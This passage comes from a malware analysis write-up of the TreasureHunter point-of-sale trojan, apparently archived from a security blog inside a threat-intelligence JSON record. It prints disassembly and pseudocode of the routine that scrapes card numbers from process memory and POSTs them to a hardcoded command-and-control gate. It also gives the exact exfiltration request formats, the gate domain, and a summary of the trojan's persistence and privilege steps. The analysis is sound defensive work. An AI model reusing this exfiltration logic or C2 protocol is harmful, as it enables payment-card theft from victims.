0x0040FF10\r\n0x0040ff10 = 101\r\n0x0040ff14 = 201\r\n0x0040ff18 = 121\r\n0x0040ff1c = 231\r\n0x0040ff20 = 221\r\n0x0040ff24 = 110\r\nIt increases a DWORD @ 0x00413D98 when a valid track1 / track2 PAN is found in a process, and sets it back to\r\n0 after PANs are sent to the gate.\r\nYou can easily trigger those types of malwares by compiling and executing the following C++ code (taken from\r\nhttp://www.kernelmode.info/forum/viewtopic.php?f=16\u0026t=1756\u0026start=50#p18059) :\r\n#include \u003ciostream\u003e\r\n#include \u003cconio.h\u003e\r\n#include \u003cwindows.h\u003e\r\nusing namespace std;\r\nchar track1[100] = \"%B4560710014901111^TEST JIM/BOGUS JOS^1107101169940000000710717906968?\";\r\nchar track2[100] = \"4744870016311111=14091010000000000072\";\r\nint main(){\r\n cout \u003c\u003c track1 \u003c\u003c endl;\r\n cout \u003c\u003c track2 \u003c\u003c endl;\r\n getch();\r\n return 0;\r\n}\r\nCnC \u0026 Data exfiltration\r\nTreasureHunter uses HTTP POST requests to contact and send credentials collected to its CnC. The gate is\r\nharcoded in the binary and the domain is still online and working.\r\n| 0x004014af bb58fd4000 mov ebx, str.x0000m.net_test_local_gate.php ; \"x0000m.net/test/local\r\nThe index page of the website has the following title : \"Mosad - Build by Redo\". We get a 404 if we try to\r\ndisplay the gate.php page in our browser, but it still responds to proper malware requests.\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 12 of 19\n\nFirst, the malware tries to contact its harcoded gate (x0000m.net) with the following request :\r\nPOST /test/local/gate.php?request=true HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n[...]\r\nrequest=1a527a9738bdf2\u0026use=J8DfbsnQabc730OkDqaDmaC\u0026id=a18948d649742114cb84de349fe6f1d0\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 13 of 19\n\n1a527a9738bdf2 is the encrypted value of \"GET_KEYS\", J8DfbsnQabc730OkDqaDmaC is an hardcoded value,\r\nprobably a campaign identifier, and a18948d649742114cb84de349fe6f1d0 is the product id. associated with the\r\ninfected machine.\r\nThe associated function starts @ 0x00401440 :\r\n .----------------------------------------------------\r\n | 0x401867 ;[g]\r\n | push 0\r\n | push 0\r\n | push 0\r\n | push 0\r\n | push ecx\r\n | ; \"POST\" @ 0x410078\r\n | push str.POST ; str.POST\r\n | push edi\r\n | sub esi, edx\r\n | ; sym.imp.WINHTTP.dll_WinHttpOpenRequest\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpOpenRequest]\r\n | push dword [ebp - local_4h]\r\n | mov edi, eax\r\n | call sub.KERNEL32.dll_HeapFree_bdf ;[e]\r\n | add esp, 4\r\n | test edi, edi\r\n | jne 0x401897 ;[f]\r\n `-----------------------------------------------------\r\n t f\r\n .---------------------------------------------------------' '---------------------------------------------\r\n |\r\n |\r\n.---------------------------------------------------------------------------------------------------------------\r\n| 0x401897 ;[f]\r\n| push 0x20000000\r\n| ; '/'\r\n| ; '/'\r\n| push 0x2f\r\n| ; \"Content-Type: application/x-www-form-urlencoded\" @ 0x410088\r\n| push str.Content_Type:_application_x_www_form_urlencoded ; str.Content_Type:_application_x_www_form_urlencoded\r\n| push edi\r\n| ; \"$..\" @ 0x40c194\r\n| call dword [sym.imp.WINHTTP.dll_WinHttpAddRequestHeaders] ;[i]\r\n| test eax, eax\r\n| je 0x40188f ;[h]\r\n`---------------------------------------------------------------------------------------------------------------\r\n f t\r\n '--------------------------.----------------------------------------------------------------------------\r\n |\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 14 of 19\n\n|\r\n .-----------------------------------------------------------.\r\n | 0x4018ae ;[k] |\r\n | push 0 |\r\n | push esi |\r\n | push esi |\r\n | push dword [ebp + arg_8h] |\r\n | push 0 |\r\n | push 0 |\r\n | push edi |\r\n | ; sym.imp.WINHTTP.dll_WinHttpSendRequest |\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpSendRequest] ;[j] |\r\n | test eax, eax |\r\n | je 0x40188f ;[h] |\r\n `-----------------------------------------------------------'\r\n f t\r\n .-' '----------------------------------------------------------------------.\r\n | |\r\n | |\r\n .---------------------------------------------------------------. |\r\n | 0x4018c4 ;[m] | |\r\n | push 0 | |\r\n | push edi | |\r\n | ; UINT uExitCode | |\r\n | ; \"z..\" @ 0x40c184 | |\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpReceiveResponse] ;[l] | |\r\n | test eax, eax | |\r\n | je 0x40188f ;[h] | |\r\n `---------------------------------------------------------------' |\r\n f t |\r\n '-.---------------------------------------------------------------. .-.----'---\r\n | | | |\r\n | | | |\r\n .-----------------------------------------------------------. .------------------\r\n | 0x4018d1 ;[p] | | 0x40188f ;[h]\r\n | ; [0xc:4]=0xffff | | pop edi\r\n | mov edx, dword [ebp + arg_ch] | | xor eax, eax\r\n | mov ecx, edi | | pop esi\r\n | call sub.KERNEL32.dll_ExitProcess_710 ;[n] | | mov esp, ebp\r\n | push edi | | pop ebp\r\n | mov esi, eax | | ret\r\n | ; sym.imp.WINHTTP.dll_WinHttpCloseHandle | `------------------\r\n | call dword [sym.imp.WINHTTP.dll_WinHttpCloseHandle] ;[o] |\r\n | pop edi |\r\n | mov eax, esi |\r\n | pop esi |\r\n | mov esp, ebp |\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 15 of 19\n\n| pop ebp |\r\n | ret |\r\n `-----------------------------------------------------------'\r\nThen, if the amount of PANs found is equal to 0 or \u003e= 50 (value from config), the thread sleeps for 60 seconds\r\n(hardcoded value). If it found more than 50 credentials, a POST request is prepared in build_request @\r\n0x004035A0 to periodically send encrypted PANs to the gate :\r\nPOST /test/local/gate.php?request=true HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\n[...]\r\nreport=[Encrypted PANs]\u0026id=a18948d649742114cb84de349fe6f1d0\r\nPANs are encrypted with the function @ 0x00402490. Finally, the thread sleeps for 180 seconds (value from\r\nconfig), and starts over. Partial pseudocode of the thread_send_PAN routine @ 0x00402AD0\r\nvoid __stdcall __noreturn thread_send_PAN(LPVOID lpThreadParameter)\r\n{\r\n while ( 1 )\r\n {\r\n EnterCriticalSection(\u0026CriticalSection);\r\n v1 = dwNbPans;\r\n if ( dwNbPans \u003e 0 )\r\n {\r\n \r\n [...]\r\n \r\n strPAN = sub_402680(v3, (const char *)v57);\r\n encrypted_PAN = encrypt_str(strPAN, (const char *)dwKey, 0, 1);\r\n v37 = (char *)lpOptional;\r\n v38 = 2 * v54;\r\n *(_DWORD *)lpOptional = 'oper';\r\n *((_WORD *)lpOptional + 2) = 'tr';\r\n *((_BYTE *)lpOptional + 6) = '=';\r\n if ( 2 * v54 \u003e 0 )\r\n {\r\n memmove((char *)lpOptional + 7, encrypted_PAN, v38);\r\n v37 = (char *)lpOptional;\r\n }\r\n *(_DWORD *)\u0026v37[v38 + 7] = '=di\u0026';\r\n v39 = (int)\u0026v37[v38];\r\n v40 = lpName;\r\n v41 = 0;\r\n do\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 16 of 19\n\n{\r\n *(_BYTE *)(v41 + v39 + 11) = v40[v41];\r\n ++v41;\r\n }\r\n while ( v41 \u003c '!' );\r\n v42 = send_request(hConnect, dwRepTrue, lpOptional, 7u);\r\n v43 = (char *)v42;\r\n if ( v42 \u0026\u0026 strstr(v42, \"success\") \u0026\u0026 bDebug == 1 )\r\n MessageBoxW(0, L\"successfully sent the dumps!\", L\"Debug Message\", 0);\r\n free((void *)strPAN);\r\n free(encrypted_PAN);\r\n free(v43);\r\n dwNbPans = 0;\r\n }\r\n LeaveCriticalSection(\u0026CriticalSection);\r\n Sleep(dw180000_0);\r\nRecap of TreasureHunter execution flow\r\nHere is a small r2 script you can load (-i script.r2) to rename interesting functions with more informative names :\r\nafn check_luhn @ 0x00403040\r\nafn check_pattern @ 0x004031d0\r\nafn check_service_codes @ 0x00403040\r\nafn parse_track1 @ 0x00403280\r\nafn parse_track2 @ 0x00403320\r\nafn check_pan @ 0x004033a0\r\nafn to_int @ 0x00401260\r\nafn send_request @ 0x00401840\r\nafn derivate_from_productid @ 0x00401F10\r\nafn create_file @ 0x004021A0\r\nafn copy_file @ 0x00402380\r\nafn decrypt_arg @ 0x004023F0\r\nafn encrypt_str @ 0x00402490\r\nafn check_format_b @ 0x00403140\r\nafn build_request @ 0x004035A0\r\nafn search_process_mem @ 0x004038A0\r\nafn search_process @ 0x00403BD0\r\naf @ 0x00403DB0; afn clingfish @ 0x00403DB0\r\nafn copy_to_appdata @ 0x00404120\r\nafn init_malware @ 0x004045F0\r\nafn check_number_PAN @ 0x004028C0\r\naf @ 0x00402AD0; afn thread_send_pan @ 0x00402AD0\r\nSummary of the malware MO :\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 17 of 19\n\n0x0040523B, start\r\nChecks PE header and gets environment strings\r\n0x004045F0, init_malware\r\nCreates mutex derivated from the system's product ID (or from a hardcoded value)\r\nCopies to %APPDATA%, starts new process with encrypted path to the old one as a parameter\r\nNew process decrypts the command line argument and deletes original file\r\nTries to elevate itself to get Debug privileges\r\nTries to reach the CnC gate\r\n0x00401440, load_config\r\nWaits for 10 minutes (value in config)\r\n0x00403BD0, search_process\r\nLists all running processes and reads their memory\r\n0x004038A0, search_process_mem\r\nReads process memory and searches for PAN\r\n0x004033A0, check_pan\r\nLooks for PAN track1 / track2 parsing in memory\r\n0x00403280, parse_track1\r\n0x00403320, parse_track2\r\n0x00403040, check_luhn\r\n0x00401840, send_request\r\nHere are some function calls to give you an idea of the malware's call flow :\r\n[0x004038a0]\u003e s search_process_mem\r\n[0x004038a0]\u003e pds\r\n0x004038a8 call fcn.0040a0f0\r\n0x004038ad \"N.@....D.#A\"\r\n0x004038d1 call dword [sym.imp.KERNEL32.dll_VirtualQueryEx]\r\n0x0040393b call dword [sym.imp.KERNEL32.dll_ReadProcessMemory] \"...\"\r\n0x00403985 call check_pan\r\n[0x004033a0]\u003e pds\r\n0x004033fb call parse_track2\r\n0x00403417 call parse_track1\r\n0x00403433 call sub.KERNEL32.dll_EnterCriticalSection_8c0\r\n[0x004033a0]\u003e s parse_track2\r\n[0x00403320]\u003e pds\r\n0x00403331 call check_luhn\r\n0x00403352 call check_format_b\r\n0x00403363 call check_pattern\r\n0x00403377 call fcn.00403250\r\n[0x00403280]\u003e pds\r\n0x0040328e call check_luhn\r\n0x004032d8 call check_format_b\r\n0x004032e9 call check_pattern\r\n0x004032fa call fcn.00403250\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 18 of 19\n\n[0x00403280]\u003e pds\r\n0x0040328e call check_luhn\r\n0x004032d8 call check_format_b\r\n0x004032e9 call check_pattern\r\n0x004032fa call fcn.00403250\r\n[0x00403140]\u003e s check_pattern\r\n[0x004031d0]\u003e pds\r\n0x00403209 call check_service_codes\r\nSource: http://adelmas.com/blog/treasurehunter.php\r\nhttp://adelmas.com/blog/treasurehunter.php\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://adelmas.com/blog/treasurehunter.php"
	],
	"report_names": [
		"treasurehunter.php"
	],
	"threat_actors": [],
	"ts_created_at": 1775433976,
	"ts_updated_at": 1775826716,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.pdf",
		"text": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.txt",
		"img": "https://archive.orkl.eu/1475ab1536f3abf5cc9a55044958a27305ffac2d.jpg"
	}
}